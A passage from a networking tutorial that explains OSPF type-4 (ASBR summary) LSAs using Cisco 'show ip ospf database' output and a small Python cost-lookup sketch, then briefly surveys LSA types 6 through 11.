0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS age | Options | 4 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Link State ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Advertising Router |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS sequence number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS checksum | length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Network Mask |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0 | metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TOS | TOS metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
The difference is in LSID meaning: while LSA3 lists the network number in this field, LSA4 places ASBR RID there. Let’s generate some LSA5 in area 1 and see what effect it has on backbone area.
R2#show ip ospf database
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 1561 0x80000028 0x009E4C 3
2.2.2.2 2.2.2.2 112 0x80000015 0x003E11 3
3.3.3.3 3.3.3.3 1180 0x8000000C 0x00342A 1
4.4.4.4 4.4.4.4 1221 0x8000000E 0x00EE65 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 1986 0x80000007 0x00E4BE
Summary Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
5.5.5.5 4.4.4.4 960 0x80000002 0x003CD9
5.5.5.55 4.4.4.4 960 0x80000002 0x00469D
192.168.45.0 4.4.4.4 960 0x80000002 0x00761E
Summary ASB Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
5.5.5.5 4.4.4.4 10 0x80000001 0x0026F0
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
3.3.3.3 3.3.3.3 1180 0x80000004 0x00FC88 0
6.6.6.6 5.5.5.5 16 0x80000001 0x00E997 0
LSA4s are generated only by ABRs, when an ABR transfers LSA5 from one area to another. In our case, 6.6.6.6/32 triggers R4 to create an LSA4 for R5.
R2#show ip ospf database asbr-summary
OSPF Router with ID (2.2.2.2) (Process ID 1)
Summary ASB Link States (Area 0)
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 144
Options: (No TOS-capability, DC, Upward)
LS Type: Summary Links(AS Boundary Router)
Link State ID: 5.5.5.5 (AS Boundary Router address)
Advertising Router: 4.4.4.4
LS Seq Number: 80000001
Checksum: 0x26F0
Length: 28
Network Mask: /0
MTID: 0 Metric: 1
Besides the ASBR ID, LSA4 also carries the metric to reach the ASBR from the ABR’s perspective. Now the node that can be considered the owner of an LSA5 prefix within the area can be easily established, thus closing the last gap in extending the graph across the AS.
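The lookup described above can be sketched roughly as follows: if the ASBR is a vertex of the local area graph, its SPF cost is used directly; otherwise the cost is the SPF cost to the ABR plus the LSA4 metric. This is a simplification of the RFC 2328 path selection rules, the function name `cost_to_asbr` is hypothetical, and the intra-area costs of 1 from R2 to its neighbours are assumptions.

```python
def cost_to_asbr(asbr, intra_area_cost, asbr_summaries):
    """Return the cost to reach an ASBR, or None if it cannot be resolved.

    intra_area_cost: {router_id: SPF cost inside the local area}
    asbr_summaries:  iterable of (asbr_router_id, advertising_abr, lsa4_metric)
    """
    if asbr in intra_area_cost:
        return intra_area_cost[asbr]  # ASBR is a vertex of the local area graph
    candidates = [
        intra_area_cost[abr] + metric
        for lsid, abr, metric in asbr_summaries
        if lsid == asbr and abr in intra_area_cost
    ]
    return min(candidates) if candidates else None


# Assumed SPF costs from R2 within area 0
intra_area_cost = {"1.1.1.1": 1, "3.3.3.3": 1, "4.4.4.4": 1}
# LSA4 from the output above: LSID 5.5.5.5, advertising router 4.4.4.4, metric 1
asbr_summaries = [("5.5.5.5", "4.4.4.4", 1)]

print(cost_to_asbr("3.3.3.3", intra_area_cost, asbr_summaries))  # local ASBR
print(cost_to_asbr("5.5.5.5", intra_area_cost, asbr_summaries))  # resolved via LSA4
```

Without the LSA4 entry, the second lookup returns `None`, meaning the LSA5 for 6.6.6.6/32 would have no vertex to attach to and could not be used.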
LSA 6, 7 and beyond
There are also a few LSA types that we have not covered yet. In this section I would like to look through them briefly. Some of these LSAs represent gradual modifications to the original algorithm. The changes are not drastic, but each is a topic of its own, which is why a detailed description of these LSAs is out of scope of this article.
LSA6 was allocated for multicast OSPF extension which has been obsolete for a very long time.
LSA7 is a knob that allows external prefixes to be injected into stub areas, turning them into so-called not-so-stubby areas, or NSSA. If FA in LSA5 gave you the creeps, LSA7 would make your hair stand on end.
LSA8 was aimed to expand LSA5 via additional attributes but it didn’t make it out of the draft.
LSA9 (link-local), 10 (area-local) and 11 (AS-wide) are called opaque LSAs. They are designed to carry arbitrary information; these LSAs are extensively used for calculating MPLS TE tunnels via constrained SPF (CSPF).